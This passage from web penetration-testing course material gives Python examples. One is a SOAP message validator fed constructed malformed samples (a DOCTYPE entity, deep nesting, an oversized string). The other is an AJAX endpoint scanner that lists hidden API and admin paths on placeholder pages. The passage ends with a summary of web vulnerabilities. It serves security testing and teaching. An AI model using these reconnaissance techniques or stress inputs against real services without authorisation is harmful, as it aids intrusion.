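        raise RejectedMessage("DOCTYPE declaration not allowed")

    parser = expat.ParserCreate()
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = character_data
    parser.StartDoctypeDeclHandler = start_doctype
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise RejectedMessage("not well-formed: %s" % exc) from exc
    return stats


# Constructed messages (not from the course) exercising each check.
SAMPLES = {
    "well_formed": (b'<?xml version="1.0"?>'
                    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
                    b'<soap:Body><GetQuote><Symbol>ACME</Symbol></GetQuote></soap:Body>'
                    b'</soap:Envelope>'),
    "deeply_nested": b"<a>" * 40 + b"</a>" * 40,
    "huge_string": b"<a><b>" + b"A" * 9000 + b"</b></a>",
    "with_doctype": b'<!DOCTYPE a [<!ENTITY e "x">]><a>&e;</a>',
    "truncated": b"<a><b>",
}


def run_samples(samples=SAMPLES) -> dict:
    """Return {name: 'accepted' or 'rejected: reason'} for each sample."""
    verdicts = {}
    for name, body in samples.items():
        try:
            check_soap_message(body)
            verdicts[name] = "accepted"
        except RejectedMessage as exc:
            verdicts[name] = "rejected: %s" % exc
    return verdicts


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print("%-14s %s" % (name, verdict))
```

The statistics returned for an accepted message are what a tester compares against the service's documented limits; a service that answers the deeply nested or oversized samples slowly, or with a stack trace, instead of with an immediate rejection is the finding Step 3 is looking for.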


AJAX Testing (slide summary)

Test for AJAX (AJAX application call endpoints): enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.

Parse the HTML and JavaScript files (XMLHttpRequest object, JavaScript files, AJAX frameworks): observe HTML and JavaScript files to find URLs of additional application surface exposure.

Use a proxy to observe traffic (format of application requests): use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the AJAX endpoints in order to determine the format and destination of the requests.

AJAX Testing
The following are the steps used to carry out AJAX pen testing:

Step 1: Test for AJAX

Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.

Step 2: Parse the HTML and JavaScript files

Observe HTML and JavaScript files to find URLs of additional application surface exposure.

Step 3: Use a proxy to observe traffic

Use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the AJAX endpoints in order to determine the format and destination of the requests.
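An added example, not part of the course or of Sprajax, of the inventory that Steps 1 and 2 build: a regex-based scan of a page and its scripts that lists external script files, form actions, and every endpoint named by XMLHttpRequest, fetch or jQuery calls. The page, scripts and host are constructed placeholders; a real run would be fed the HTML and JavaScript that a crawler or proxy fetched.

```python
import re
from urllib.parse import urljoin

# Constructed page and script, standing in for what a crawler or proxy would fetch.
BASE_URL = "https://app.example.test/"   # placeholder host
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/api/v1/account/balance?id=42", true);
  xhr.send();
</script>
</head><body>
<form action="/login" method="post"><input name="user"></form>
</body></html>"""
SAMPLE_SCRIPTS = {
    "/static/app.js": """
fetch('/api/v1/orders', {method: 'POST', body: JSON.stringify(order)});
$.ajax({ url: "/api/v1/admin/users", type: "GET" });
$.getJSON("/api/v1/search?q=" + term, render);
""",
}

Q = r"""['"]"""   # a single or double quote
# Common ways JavaScript names an AJAX endpoint; only string-literal URLs are found,
# so URLs built at runtime still need the proxy observation of Step 3.
ENDPOINT_PATTERNS = [
    re.compile(r"\.open\(\s*" + Q + r"[A-Za-z]+" + Q + r"\s*,\s*" + Q + r"(?P<url>[^'\"]+)" + Q),  # XMLHttpRequest
    re.compile(r"\bfetch\(\s*" + Q + r"(?P<url>[^'\"]+)" + Q),                                   # fetch()
    re.compile(r"\burl\s*:\s*" + Q + r"(?P<url>[^'\"]+)" + Q),                                   # $.ajax({url: ...})
    re.compile(r"\$\.(?:get|post|getJSON)\(\s*" + Q + r"(?P<url>[^'\"]+)" + Q),                 # jQuery shorthands
]
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*" + Q + r"([^'\"]+)" + Q, re.I)
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc\s*=)[^>]*>(.*?)</script>", re.I | re.S)
FORM_ACTION = re.compile(r"<form[^>]*\baction\s*=\s*" + Q + r"([^'\"]+)" + Q, re.I)


def extract_endpoints(js: str, base_url: str) -> set:
    """Return the absolute URLs named by AJAX calls in one script body."""
    found = set()
    for pattern in ENDPOINT_PATTERNS:
        for match in pattern.finditer(js):
            found.add(urljoin(base_url, match.group("url")))
    return found


def inventory(html: str, scripts: dict, base_url: str) -> dict:
    """Enumerate the surface a page exposes: external script files, form
    actions, and every AJAX endpoint named in inline or external JavaScript.
    `scripts` maps each script src to its fetched text."""
    endpoints = set()
    for body in INLINE_SCRIPT.findall(html):
        endpoints |= extract_endpoints(body, base_url)
    for body in scripts.values():
        endpoints |= extract_endpoints(body, base_url)
    return {
        "script_files": sorted(urljoin(base_url, s) for s in SCRIPT_SRC.findall(html)),
        "form_actions": sorted(urljoin(base_url, a) for a in FORM_ACTION.findall(html)),
        "ajax_endpoints": sorted(endpoints),
    }


if __name__ == "__main__":
    for kind, urls in inventory(SAMPLE_HTML, SAMPLE_SCRIPTS, BASE_URL).items():
        print(kind)
        for url in urls:
            print("  ", url)
```

Endpoints that appear in this list but never in the page's visible navigation (the admin path in the constructed script is the kind of thing to look for) are the "additional application surface exposure" of Step 2 and should be checked for the same authentication and authorisation controls as the pages that call them.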



Module Summary

Organizations today rely heavily on web applications and Web 2.0 technologies to support key business processes and improve performance. With increasing dependence, web applications and web services are increasingly being targeted by various attacks that result in huge revenue loss for the organizations. Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc.

Input validation flaws are a major concern, as attackers can exploit these flaws to perform or create a base for most of the web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc.

It is also observed that most of the vulnerabilities result from misconfiguration and not following standard security practices. Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using a WAF firewall/IDS, and performing regular auditing of the network using web application security tools.
